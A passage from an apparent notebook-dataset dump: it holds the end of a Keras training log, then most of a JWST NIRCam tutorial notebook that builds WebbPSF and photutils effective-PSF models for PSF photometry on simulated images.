5ms/step - loss: 0.4424 - accuracy: 0.7400\nEpoch 956/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4408 - accuracy: 0.7600\nEpoch 957/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4384 - accuracy: 0.7800\nEpoch 958/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4587 - accuracy: 0.7400\nEpoch 959/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4433 - accuracy: 0.7600\nEpoch 960/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4398 - accuracy: 0.8000\nEpoch 961/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4522 - accuracy: 0.7400\nEpoch 962/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4341 - accuracy: 0.7600\nEpoch 963/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4379 - accuracy: 0.7800\nEpoch 964/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4755 - accuracy: 0.8200\nEpoch 965/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4680 - accuracy: 0.7400\nEpoch 966/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4384 - accuracy: 0.7800\nEpoch 967/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4566 - accuracy: 0.7400\nEpoch 968/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4422 - accuracy: 0.8000\nEpoch 969/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4549 - accuracy: 0.8200\nEpoch 970/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4384 - accuracy: 0.7800\nEpoch 971/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4511 - accuracy: 0.7400\nEpoch 972/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4542 - accuracy: 0.7600\nEpoch 973/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4425 - accuracy: 0.8000\nEpoch 974/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4357 - accuracy: 0.7800\nEpoch 975/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4524 - accuracy: 0.7800\nEpoch 976/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4308 - accuracy: 0.7800\nEpoch 977/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4422 - accuracy: 0.7800\nEpoch 978/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4315 - accuracy: 0.7800\nEpoch 979/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4406 - accuracy: 0.8000\nEpoch 980/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4425 - accuracy: 0.7600\nEpoch 981/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4465 - accuracy: 0.7200\nEpoch 982/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4369 - accuracy: 0.7600\nEpoch 983/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4478 - accuracy: 0.7200\nEpoch 984/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4411 - accuracy: 0.8000\nEpoch 985/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4307 - accuracy: 0.7800\nEpoch 986/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4386 - accuracy: 0.8000\nEpoch 987/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4501 - accuracy: 0.7400\nEpoch 988/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4444 - accuracy: 0.7400\nEpoch 989/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4529 - accuracy: 0.8000\nEpoch 990/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4717 - accuracy: 0.7800\nEpoch 991/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4744 - accuracy: 0.7400\nEpoch 992/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4597 - accuracy: 0.7800\nEpoch 993/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4434 - accuracy: 0.7200\nEpoch 994/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4433 - accuracy: 0.7600\nEpoch 995/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4529 - accuracy: 0.8000\nEpoch 996/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4850 - accuracy: 0.7200\nEpoch 997/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4366 - accuracy: 0.7400\nEpoch 998/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4690 - accuracy: 0.7800\nEpoch 999/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4324 - accuracy: 0.8000\nEpoch 1000/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4388 - accuracy: 0.7800\n"
],
[
"model.evaluate(x_train, y_train)",
"2/2 [==============================] - 0s 8ms/step - loss: 0.4132 - accuracy: 0.8000\n"
],
[
"x_train[0:1]",
"_____no_output_____"
],
[
"model.predict(x_train[0:1]) # 의견이 나옴 ",
"_____no_output_____"
],
[
"# first = 0.61538462\n# second = 0.07692308\n# third = 0.53846154\n# pred = model.predict( [[ [first], [second], [third] ]] )\n\n# predict에 직접 값을 넣을 때 괄호 씌우기",
"_____no_output_____"
],
[
"pred = model.predict( x_train[0:1] )",
"_____no_output_____"
],
[
"np.argmax(pred)",
"_____no_output_____"
]
],
[
[
"\n\n---\n\n\n\n---\n\n\n",
"_____no_output_____"
]
],
[
[
"",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
e7073865f652060e396a816f8e973e9c86ffd685 | 108,369 | ipynb | Jupyter Notebook | _notebooks/psf_photometry/NIRCam_PSF_Photometry_Example.ipynb | TheRealZoidberg/fastpagesTest | cc77425ff2734429473ff4cbe1dc7682f022a094 | [
"Apache-2.0"
] | null | null | null | _notebooks/psf_photometry/NIRCam_PSF_Photometry_Example.ipynb | TheRealZoidberg/fastpagesTest | cc77425ff2734429473ff4cbe1dc7682f022a094 | [
"Apache-2.0"
] | null | null | null | _notebooks/psf_photometry/NIRCam_PSF_Photometry_Example.ipynb | TheRealZoidberg/fastpagesTest | cc77425ff2734429473ff4cbe1dc7682f022a094 | [
"Apache-2.0"
] | null | null | null | 39.929624 | 954 | 0.570283 | [
[
[
"# NIRCam PSF Photometry Notebook\n\n\n**Data**: NIRCam simulated images obtained using [MIRAGE](https://jwst-docs.stsci.edu/jwst-other-tools/mirage-data-simulator) and run through the [JWST pipeline](https://jwst-pipeline.readthedocs.io/en/latest/) of the Large Magellanic Cloud (LMC) Astrometric Calibration Field. Simulations is obtained using a 4-pt subpixel dither for three couples of wide filters: F070W, F115W, and F200W for the SW channel, and F277W, F356W, and F444W for the LW channel. We simulated only 1 NIRCam SW detector (i.e., \"NRCB1\"). \n\nFor this example, we use Level-2 images (.cal, calibrated but not rectified) for two SW filters (i.e., F115W and F200W) and derive the photometry in each one of them. The images for the other filters are also available and can be used to test the notebook and/or different filters combination. \n\nThe notebook is divided in two parts: in Part I we show how to create a PSF model and perform the PSF photometry, whereas in Part II, we show how to derive the final calibrated Color-Magnitude Diagram.\n\nPSF Photometry can be obtained using:\n\n* single model obtained from WebbPSF\n* grid of PSF models from WebbPSF\n* single effective PSF (ePSF)\n\n### Work in Progress:\n\n* create a grid of ePSF and perform reduction using the ePSF grid\n* use the ePSF grid to perturbate the WebbPSF model\n\nThe notebook shows:\n\n* how to obtain the PSF model from WebbPSF (or build an ePSF)\n* how to perform PSF photometry on the image\n* how to cross-match the catalogs of the different images\n* how to derive and apply photometric zeropoint\n\nFinal plots show:\n\n* Instrumental Color-Magnitude Diagrams for the 4 images\n* Instrumental Color-Magnitude Diagrams and errors\n* Magnitudes Zeropoints \n* Calibrated Color-Magnitude Diagram (compared with Input Color-Magnitude Diagram)\n* Comparison between input and output photometry",
"_____no_output_____"
],
[
"**Note on pysynphot**: Data files for pysynphot are distributed separately by Calibration Reference Data System. They are expected to follow a certain directory structure under the root directory, identified by the PYSYN_CDBS environment variable that must be set prior to using this package. In the example below, the root directory is arbitrarily named /my/local/dir/trds/. \\\nexport PYSYN_CDBS=/my/local/dir/trds/ \\\nSee documentation [here](https://pysynphot.readthedocs.io/en/latest/#installation-and-setup) for the configuration and download of the data files.",
"_____no_output_____"
],
[
"## Import Functions",
"_____no_output_____"
]
],
[
[
"import os\nimport sys\nimport time\n\nimport numpy as np\n\nimport pandas as pd\n\nimport glob as glob\n\nimport jwst\nfrom jwst.datamodels import ImageModel\n\nimport tarfile\n\nimport urllib.request\n\nfrom astropy import wcs\nfrom astropy import units as u\nfrom astropy.io import fits\nfrom astropy.visualization import (ZScaleInterval, SqrtStretch, ImageNormalize)\nfrom astropy.visualization import simple_norm\nfrom astropy.nddata import Cutout2D, NDData\nfrom astropy.stats import gaussian_sigma_to_fwhm\nfrom astropy.table import Table, QTable\nfrom astropy.modeling.fitting import LevMarLSQFitter\nfrom astropy.wcs.utils import pixel_to_skycoord\nfrom astropy.coordinates import SkyCoord, match_coordinates_sky\nfrom astropy.stats import sigma_clipped_stats\n\nfrom photutils import CircularAperture, EPSFBuilder, find_peaks, CircularAnnulus\nfrom photutils.detection import DAOStarFinder, IRAFStarFinder\nfrom photutils.psf import DAOGroup, IntegratedGaussianPRF, extract_stars, IterativelySubtractedPSFPhotometry\nfrom photutils.background import MMMBackground, MADStdBackgroundRMS\nfrom photutils.centroids import centroid_2dg\nfrom photutils import aperture_photometry\n\nfrom ipywidgets import interact\n\nimport webbpsf\nfrom webbpsf.utils import to_griddedpsfmodel\n\nimport pysynphot # PYSIN_CDBS must be defined in the user's environment (see note above)",
"_____no_output_____"
]
],
[
[
"## Import Plotting Functions",
"_____no_output_____"
]
],
[
[
"%matplotlib inline\nfrom matplotlib import style, pyplot as plt\nimport matplotlib.patches as patches\nimport matplotlib.ticker as ticker\n\nplt.rcParams['image.cmap'] = 'viridis'\nplt.rcParams['image.origin'] = 'lower'\nplt.rcParams['axes.titlesize'] = plt.rcParams['axes.labelsize'] = 30\nplt.rcParams['xtick.labelsize'] = plt.rcParams['ytick.labelsize'] = 30\n\nfont1 = {'family': 'helvetica', 'color': 'black', 'weight': 'normal', 'size': '12'}\nfont2 = {'family': 'helvetica', 'color': 'black', 'weight': 'normal', 'size': '20'}",
"_____no_output_____"
]
],
[
[
"## Load the images and create some useful dictionaries\n\nWe load all the images and we create a dictionary that contains all of them, divided by detectors and filters. This is useful to check which detectors and filters are available and to decide if we want to perform the photometry on all of them or only on a subset (for example, only on the SW filters). \n\nWe also create a dictionary with some useful parameters for the analysis. The dictionary contains the photometric zeropoints (from [MIRAGE](https://jwst-docs.stsci.edu/jwst-other-tools/mirage-data-simulator) configuration files) and the NIRCam point spread function (PSF) FWHM, from the [NIRCam Point Spread Function](https://jwst-docs.stsci.edu/near-infrared-camera/nircam-predicted-performance/nircam-point-spread-functions) JDox page. The FWHM are calculated from the analysis of the expected NIRCam PSFs simulated with [WebbPSF](https://www.stsci.edu/jwst/science-planning/proposal-planning-toolbox/psf-simulation-tool). \n\n**Note**: this dictionary will be updated once the values for zeropoints and FWHM will be available for each detectors after commissioning. \n\nHence, we have two dictionaries:\n\n* dictionary for the single Level-2 calibrated images\n* dictionary with some other useful parameters\n",
"_____no_output_____"
]
],
[
[
"dict_images = {'NRCA1': {}, 'NRCA2': {}, 'NRCA3': {}, 'NRCA4': {}, 'NRCA5': {},\n 'NRCB1': {}, 'NRCB2': {}, 'NRCB3': {}, 'NRCB4': {}, 'NRCB5': {}}\n\ndict_filter_short = {}\ndict_filter_long = {}\n\nff_short = []\ndet_short = []\ndet_long = []\nff_long = []\ndetlist_short = []\ndetlist_long = []\nfiltlist_short = []\nfiltlist_long = []\n\nif not glob.glob('./*cal*fits'):\n\n print(\"Downloading images\")\n\n boxlink_images_lev2 = 'https://data.science.stsci.edu/redirect/JWST/jwst-data_analysis_tools/stellar_photometry/images_level2.tar.gz'\n boxfile_images_lev2 = './images_level2.tar.gz'\n urllib.request.urlretrieve(boxlink_images_lev2, boxfile_images_lev2)\n\n tar = tarfile.open(boxfile_images_lev2, 'r')\n tar.extractall()\n\n images_dir = './'\n images = sorted(glob.glob(os.path.join(images_dir, \"*cal.fits\")))\n\nelse:\n\n images_dir = './'\n images = sorted(glob.glob(os.path.join(images_dir, \"*cal.fits\")))\n\nfor image in images:\n\n im = fits.open(image)\n f = im[0].header['FILTER']\n d = im[0].header['DETECTOR']\n\n if d == 'NRCBLONG':\n d = 'NRCB5'\n elif d == 'NRCALONG':\n d = 'NRCA5'\n else:\n d = d\n\n wv = np.float(f[1:3])\n\n if wv > 24: \n ff_long.append(f)\n det_long.append(d)\n\n else:\n ff_short.append(f)\n det_short.append(d) \n\n detlist_short = sorted(list(dict.fromkeys(det_short)))\n detlist_long = sorted(list(dict.fromkeys(det_long)))\n\n unique_list_filters_short = []\n unique_list_filters_long = []\n\n for x in ff_short:\n\n if x not in unique_list_filters_short:\n\n dict_filter_short.setdefault(x, {})\n\n for x in ff_long:\n if x not in unique_list_filters_long:\n dict_filter_long.setdefault(x, {}) \n\n for d_s in detlist_short:\n dict_images[d_s] = dict_filter_short\n\n for d_l in detlist_long:\n dict_images[d_l] = dict_filter_long\n\n filtlist_short = sorted(list(dict.fromkeys(dict_filter_short)))\n filtlist_long = sorted(list(dict.fromkeys(dict_filter_long)))\n\n if len(dict_images[d][f]) == 0:\n dict_images[d][f] = {'images': [image]}\n else:\n dict_images[d][f]['images'].append(image)\n\nprint(\"Available Detectors for SW channel:\", detlist_short)\nprint(\"Available Detectors for LW channel:\", detlist_long)\nprint(\"Available SW Filters:\", filtlist_short)\nprint(\"Available LW Filters:\", filtlist_long)",
"_____no_output_____"
],
[
"filters = ['F070W', 'F090W', 'F115W', 'F140M', 'F150W2', 'F150W', 'F162M', 'F164N', 'F182M',\n 'F187N', 'F200W', 'F210M', 'F212N', 'F250M', 'F277W', 'F300M', 'F322W2', 'F323N',\n 'F335M', 'F356W', 'F360M', 'F405N', 'F410M', 'F430M', 'F444W', 'F460M', 'F466N', 'F470N', 'F480M']\n\npsf_fwhm = [0.987, 1.103, 1.298, 1.553, 1.628, 1.770, 1.801, 1.494, 1.990, 2.060, 2.141, 2.304, 2.341, 1.340,\n 1.444, 1.585, 1.547, 1.711, 1.760, 1.830, 1.901, 2.165, 2.179, 2.300, 2.302, 2.459, 2.507, 2.535, 2.574]\n\nzp_modA = [25.7977, 25.9686, 25.8419, 24.8878, 27.0048, 25.6536, 24.6957, 22.3073, 24.8258, 22.1775, 25.3677, 24.3296,\n 22.1036, 22.7850, 23.5964, 24.8239, 23.6452, 25.3648, 20.8604, 23.5873, 24.3778, 23.4778, 20.5588,\n 23.2749, 22.3584, 23.9731, 21.9502, 20.0428, 19.8869, 21.9002]\n\nzp_modB = [25.7568, 25.9771, 25.8041, 24.8738, 26.9821, 25.6279, 24.6767, 22.2903, 24.8042, 22.1499, 25.3391, 24.2909,\n 22.0574, 22.7596, 23.5011, 24.6792, 23.5769, 25.3455, 20.8631, 23.4885, 24.3883, 23.4555, 20.7007,\n 23.2763, 22.4677, 24.1562, 22.0422, 20.1430, 20.0173, 22.4086]\n\ndict_utils = {filters[i]: {'psf fwhm': psf_fwhm[i], 'VegaMAG zp modA': zp_modA[i],\n 'VegaMAG zp modB': zp_modB[i]} for i in range(len(filters))}",
"_____no_output_____"
]
],
[
[
"## Select the detectors and/or filters for the analysis\n\nIf we are interested only in some filters (and/or some detectors) in the analysis, as in this example, we can select the Level-2 calibrated images from the dictionary for those filters (detectors) and analyze only those images.\n\nIn this particular example, we analyze images for filters **F115W** and **F200W** for the detector **NRCB1**.",
"_____no_output_____"
]
],
[
[
"dets_short = ['NRCB1'] # detector of interest in this example\nfilts_short = ['F115W', 'F200W'] # filters of interest in this example",
"_____no_output_____"
]
],
[
[
"## Display the images\n\nTo check that our images do not present artifacts and can be used in the analysis, we display them using an interactive cursor that allows to shuffle through the different images for each filter.\n\n### Note for developers: \n\nthis is only a sketch of what I would like to show (I am not very familiar with ipywidgets). Would it be possible to show both filters at the same time, in a 2 window panel as in the static plot below? Or even better, have a widget control that allows to select the filters available and then use interact to cycle through the images? ",
"_____no_output_____"
]
],
[
[
"# cell for display images using ipywidgets\n\ndef browse_images(images):\n n = len(images)\n\n def view_image(image):\n det = 'NRCB1'\n filt = 'F115W'\n im = fits.open(dict_images[det][filt]['images'][image])\n\n data_sb = im[1].data\n norm = simple_norm(data_sb, 'sqrt', percent=99.) \n plt.figure(figsize=(10, 10))\n\n plt.title(filt)\n plt.imshow(data_sb, norm=norm, cmap='Greys') \n plt.show()\n\n interact(view_image, image=(0, n - 1))",
"_____no_output_____"
],
[
"browse_images(dict_images['NRCB1']['F115W']['images'])",
"_____no_output_____"
]
],
[
[
"### Note for developers: \n\nCell below should be removed once we finalize the interactive one above.",
"_____no_output_____"
]
],
[
[
"plt.figure(figsize=(14, 14))\n\nfor det in dets_short:\n for i, filt in enumerate(filts_short):\n\n image = fits.open(dict_images[det][filt]['images'][0])\n data_sb = image[1].data\n\n ax = plt.subplot(1, len(filts_short), i + 1)\n\n plt.xlabel(\"X [px]\", fontdict=font2)\n plt.ylabel(\"Y [px]\", fontdict=font2)\n plt.title(filt, fontdict=font2)\n norm = simple_norm(data_sb, 'sqrt', percent=99.)\n\n ax.imshow(data_sb, norm=norm, cmap='Greys')\n\nplt.tight_layout()",
"_____no_output_____"
]
],
[
[
"## Create the PSF models",
"_____no_output_____"
],
[
"## I. Create the PSF model using WebbPSF\n\nWe create a dictionary that contains the PSF created using WebbPSF for the detectors and filters selected above.",
"_____no_output_____"
]
],
[
[
"dict_psfs_webbpsf = {}\n\nfor det in dets_short:\n dict_psfs_webbpsf.setdefault(det, {})\n for j, filt in enumerate(filts_short):\n dict_psfs_webbpsf[det].setdefault(filt, {})\n\n dict_psfs_webbpsf[det][filt]['psf model grid'] = None\n dict_psfs_webbpsf[det][filt]['psf model single'] = None",
"_____no_output_____"
]
],
[
[
"The function below allows to create a single PSF or a grid of PSFs and allows to save the PSF as a fits file. The model PSF are stored by default in the psf dictionary. For the grid of PSFs, users can select the number of PSFs to be created. The PSF can be created detector sampled or oversampled (the oversample can be changed inside the function).\n\n**Note**: The default source spectrum is, if `pysynphot` is installed, a G2V star spectrum from Castelli & Kurucz (2004). Without `pysynphot`, the default is a simple flat spectrum such that the same number of photons are detected at each wavelength.",
"_____no_output_____"
]
],
[
[
"def create_psf_model(fov=11, create_grid=False, num=9, save_psf=False, detsampled=False):\n\n nrc = webbpsf.NIRCam()\n\n nrc.detector = det \n nrc.filter = filt\n\n src = webbpsf.specFromSpectralType('G5V', catalog='phoenix')\n if detsampled:\n print(\"Creating a detector sampled PSF\")\n aa = 'detector sampled'\n fov = 21\n else:\n print(\"Creating a oversampled PSF\")\n aa = 'oversampled'\n fov = fov\n\n print(\"Using a {field}\".format(field=fov), \"px fov\")\n\n if create_grid:\n print(\"\")\n print(\"Creating a grid of PSF for filter {filt} and detector {det}\".format(filt=filt, det=det))\n print(\"\")\n num = num\n\n if save_psf:\n\n outname = \"./PSF_%s_samp4_G5V_fov%d_npsfs%d.fits\" % (filt, fov, num)\n nrc.psf_grid(num_psfs=num, oversample=4, source=src, all_detectors=False, fov_pixels=fov,\n save=True, outfile=outname, use_detsampled_psf=detsampled)\n else:\n grid_psf = nrc.psf_grid(num_psfs=num, oversample=4, source=src, all_detectors=False,\n fov_pixels=fov, use_detsampled_psf=detsampled)\n dict_psfs_webbpsf[det][filt]['psf model grid'] = grid_psf\n else:\n print(\"\")\n print(\"Creating a single PSF for filter {filt} and detector {det}\".format(filt=filt, det=det))\n print(\"\")\n num = 1\n if save_psf:\n outname = \"./PSF_%s_samp4_G5V_fov%d_npsfs%d.fits\" % (filt, fov, num)\n nrc.psf_grid(num_psfs=num, oversample=4, source=src, all_detectors=False, fov_pixels=fov,\n save=True, outfile=outname, use_detsampled_psf=detsampled)\n else:\n single_psf = nrc.psf_grid(num_psfs=num, oversample=4, source=src, all_detectors=False,\n fov_pixels=fov, use_detsampled_psf=detsampled)\n dict_psfs_webbpsf[det][filt]['psf model single'] = single_psf\n\n return ",
"_____no_output_____"
]
],
[
[
"### Single PSF model",
"_____no_output_____"
]
],
[
[
"for det in dets_short:\n for filt in filts_short:\n create_psf_model(fov=11, num=25, create_grid=False, save_psf=False, detsampled=False)",
"_____no_output_____"
]
],
[
[
"## Display the single PSF models",
"_____no_output_____"
]
],
[
[
"plt.figure(figsize=(14, 14))\n\nfor det in dets_short:\n for i, filt in enumerate(filts_short):\n ax = plt.subplot(1, 2, i + 1)\n\n norm_epsf = simple_norm(dict_psfs_webbpsf[det][filt]['psf model single'].data[0], 'log', percent=99.)\n ax.set_title(filt, fontsize=40)\n ax.imshow(dict_psfs_webbpsf[det][filt]['psf model single'].data[0], norm=norm_epsf)\n ax.set_xlabel('X [px]', fontsize=30)\n ax.set_ylabel('Y [px]', fontsize=30)\nplt.tight_layout()",
"_____no_output_____"
]
],
[
[
"### PSF grid",
"_____no_output_____"
]
],
[
[
"for det in dets_short:\n for filt in filts_short:\n create_psf_model(fov=11, num=25, create_grid=True, save_psf=False, detsampled=False)",
"_____no_output_____"
]
],
[
[
"## Display the PSFs grid\n\nWe show for 1 filter (**F115W**) the grid of PSFs and the difference from the mean",
"_____no_output_____"
]
],
[
[
"webbpsf.gridded_library.display_psf_grid(dict_psfs_webbpsf[dets_short[0]][filts_short[0]]['psf model grid'],\n zoom_in=False, figsize=(14, 14))",
"_____no_output_____"
]
],
[
[
"## II. Create the PSF model building an Effective PSF (ePSF)\n\nMore information on the PhotUtils Effective PSF can be found [here](https://photutils.readthedocs.io/en/stable/epsf.html).\n\n* Select the stars from the images we want to use for building the PSF. We use the [DAOStarFinder](https://photutils.readthedocs.io/en/stable/api/photutils.detection.DAOStarFinder.html) function to find bright stars in the images (setting a high detection threshold). [DAOStarFinder](https://photutils.readthedocs.io/en/stable/api/photutils.detection.DAOStarFinder.html#photutils.detection.DAOStarFinder) detects stars in an image using the DAOFIND ([Stetson 1987](https://ui.adsabs.harvard.edu/abs/1987PASP...99..191S/abstract)) algorithm. DAOFIND searches images for local density maxima that have a peak amplitude greater than `threshold` (approximately; threshold is applied to a convolved image) and have a size and shape similar to the defined 2D Gaussian kernel. \\\n **Note**: The threshold and the maximum distance to the closest neighbour depend on the user science case (i.e.; number of stars in the field of view, crowding, number of bright sources, minimum number of stars required to build the ePSF, etc.) and must be modified accordingly. \n* Build the effective PSF (excluding objects for which the bounding box exceed the detector edge) using [EPSBuilder](https://photutils.readthedocs.io/en/stable/api/photutils.psf.EPSFBuilder.html#photutils.psf.EPSFBuilder) function.",
"_____no_output_____"
],
[
"We create a dictionary that contains the effective PSF for the detectors and filters selected above.",
"_____no_output_____"
]
],
[
[
"dict_psfs_epsf = {}\n\nfor det in dets_short:\n dict_psfs_epsf.setdefault(det, {})\n for j, filt in enumerate(filts_short):\n dict_psfs_epsf[det].setdefault(filt, {})\n\n dict_psfs_epsf[det][filt]['table psf stars'] = {}\n dict_psfs_epsf[det][filt]['epsf single'] = {}\n dict_psfs_epsf[det][filt]['epsf grid'] = {}\n\n for i in np.arange(0, len(dict_images[det][filt]['images']), 1):\n\n dict_psfs_epsf[det][filt]['table psf stars'][i + 1] = None\n dict_psfs_epsf[det][filt]['epsf single'][i + 1] = None\n dict_psfs_epsf[det][filt]['epsf grid'][i + 1] = None",
"_____no_output_____"
]
],
[
[
"Note that the unit of the Level-2 and Level-3 Images from the pipeline is MJy/sr (hence a surface brightness). The actual unit of the image can be checked from the header keyword **BUNIT**. The scalar conversion constant is copied to the header keyword **PHOTMJSR**, which gives the conversion from DN/s to megaJy/steradian. For our analysis we revert back to DN/s.",
"_____no_output_____"
]
],
[
[
"def find_stars_epsf(det='NRCA1', filt='F070W', dist_sel=False):\n\n bkgrms = MADStdBackgroundRMS()\n mmm_bkg = MMMBackground()\n\n image = fits.open(dict_images[det][filt]['images'][i])\n data_sb = image[1].data\n imh = image[1].header\n\n print(\"Finding PSF stars on image {number} of filter {f}, detector {d}\".format(number=i + 1, f=filt, d=det))\n\n data = data_sb / imh['PHOTMJSR']\n print(\"Conversion factor from {units} to DN/s for filter {f}:\".format(units=imh['BUNIT'], f=filt), imh['PHOTMJSR'])\n\n sigma_psf = dict_utils[filt]['psf fwhm']\n\n print(\"FWHM for the filter {f}:\".format(f=filt), sigma_psf, \"px\")\n\n std = bkgrms(data)\n bkg = mmm_bkg(data)\n daofind = DAOStarFinder(threshold=th[j] * std + bkg, fwhm=sigma_psf, roundhi=1.0, roundlo=-1.0,\n sharplo=0.30, sharphi=1.40)\n\n psf_stars = daofind(data)\n dict_psfs_epsf[det][filt]['table psf stars'][i + 1] = psf_stars\n \n if dist_sel:\n\n print(\"\")\n print(\"Calculating closest neigbhour distance\")\n\n d = []\n\n daofind_tot = DAOStarFinder(threshold=10 * std + bkg, fwhm=sigma_psf, roundhi=1.0, roundlo=-1.0,\n sharplo=0.30, sharphi=1.40)\n\n stars_tot = daofind_tot(data)\n\n x_tot = stars_tot['xcentroid']\n y_tot = stars_tot['ycentroid']\n\n for xx, yy in zip(psf_stars['xcentroid'], psf_stars['ycentroid']):\n\n sep = []\n dist = np.sqrt((x_tot - xx)**2 + (y_tot - yy)**2)\n sep = np.sort(dist)[1:2][0]\n d.append(sep)\n\n psf_stars['min distance'] = d\n mask_dist = (psf_stars['min distance'] > min_sep[j])\n\n psf_stars = psf_stars[mask_dist]\n\n dict_psfs_epsf[det][filt]['table psf stars'][i + 1] = psf_stars\n\n print(\"Minimum distance required:\", min_sep[j], \"px\")\n print(\"\")\n print(\"Number of isolated sources found in the image used to build ePSF for {f}:\".format(f=filt), len(psf_stars))\n print(\"-----------------------------------------------------\")\n print(\"\")\n else:\n print(\"\")\n print(\"Number of sources used to build ePSF for {f}:\".format(f=filt), len(psf_stars))\n print(\"--------------------------------------------\")\n print(\"\")",
"_____no_output_____"
],
[
"tic = time.perf_counter()\n\nth = [700, 500] # threshold level for the two filters (length must match number of filters analyzed)\nmin_sep = [10, 10] # minimum separation acceptable for ePSF stars from closest neighbour\n\nfor det in dets_short:\n for j, filt in enumerate(filts_short):\n for i in np.arange(0, len(dict_images[det][filt]['images']), 1):\n\n find_stars_epsf(det=det, filt=filt, dist_sel=False)\n\ntoc = time.perf_counter()\n\nprint(\"Elapsed Time for finding stars:\", toc - tic)",
"_____no_output_____"
]
],
[
[
"### II. Build Effective PSF",
"_____no_output_____"
]
],
[
[
"def build_epsf(det='NRCA1', filt='F070W'):\n \n mmm_bkg = MMMBackground()\n \n image = fits.open(dict_images[det][filt]['images'][i])\n data_sb = image[1].data\n imh = image[1].header\n\n data = data_sb / imh['PHOTMJSR']\n\n hsize = (sizes[j] - 1) / 2\n\n x = dict_psfs_epsf[det][filt]['table psf stars'][i + 1]['xcentroid']\n y = dict_psfs_epsf[det][filt]['table psf stars'][i + 1]['ycentroid']\n mask = ((x > hsize) & (x < (data.shape[1] - 1 - hsize)) & (y > hsize) & (y < (data.shape[0] - 1 - hsize)))\n\n stars_tbl = Table()\n stars_tbl['x'] = x[mask]\n stars_tbl['y'] = y[mask]\n\n bkg = mmm_bkg(data)\n\n data_bkgsub = data.copy()\n\n data_bkgsub -= bkg\n\n nddata = NDData(data=data_bkgsub)\n stars = extract_stars(nddata, stars_tbl, size=sizes[j])\n\n print(\"Creating ePSF for image {number} of filter {f}, detector {d}\".format(number=i + 1, f=filt, d=det))\n\n epsf_builder = EPSFBuilder(oversampling=oversample, maxiters=3, progress_bar=False)\n\n epsf, fitted_stars = epsf_builder(stars)\n dict_psfs_epsf[det][filt]['epsf single'][i + 1] = epsf",
"_____no_output_____"
]
],
[
[
"**Note**: here we limit the maximum number of iterations to 3 (to limit it’s run time), but in practice one should use about 10 or more iterations.",
"_____no_output_____"
]
],
[
[
"tic = time.perf_counter()\n\nsizes = [11, 11] # size of the cutout (extract region) for each PSF star - must match number of filters analyzed\noversample = 4\n\nfor det in dets_short:\n for j, filt in enumerate(filts_short):\n for i in np.arange(0, len(dict_images[det][filt]['images']), 1):\n build_epsf(det=det, filt=filt)\n\ntoc = time.perf_counter()\n\nprint(\"Time to build the Effective PSF:\", toc - tic) ",
"_____no_output_____"
]
],
[
[
"## Display the ePSFs \n\nWe display only 1 ePSF for each filter",
"_____no_output_____"
]
],
[
[
"plt.figure(figsize=(14, 14))\n\nfor det in dets_short:\n for i, filt in enumerate(filts_short):\n ax = plt.subplot(1, 2, i + 1)\n\n norm_epsf = simple_norm(dict_psfs_epsf[det][filt]['epsf single'][i + 1].data, 'log', percent=99.)\n plt.title(filt, fontsize=30)\n ax.imshow(dict_psfs_epsf[det][filt]['epsf single'][i + 1].data, norm=norm_epsf)",
"_____no_output_____"
]
],
[
[
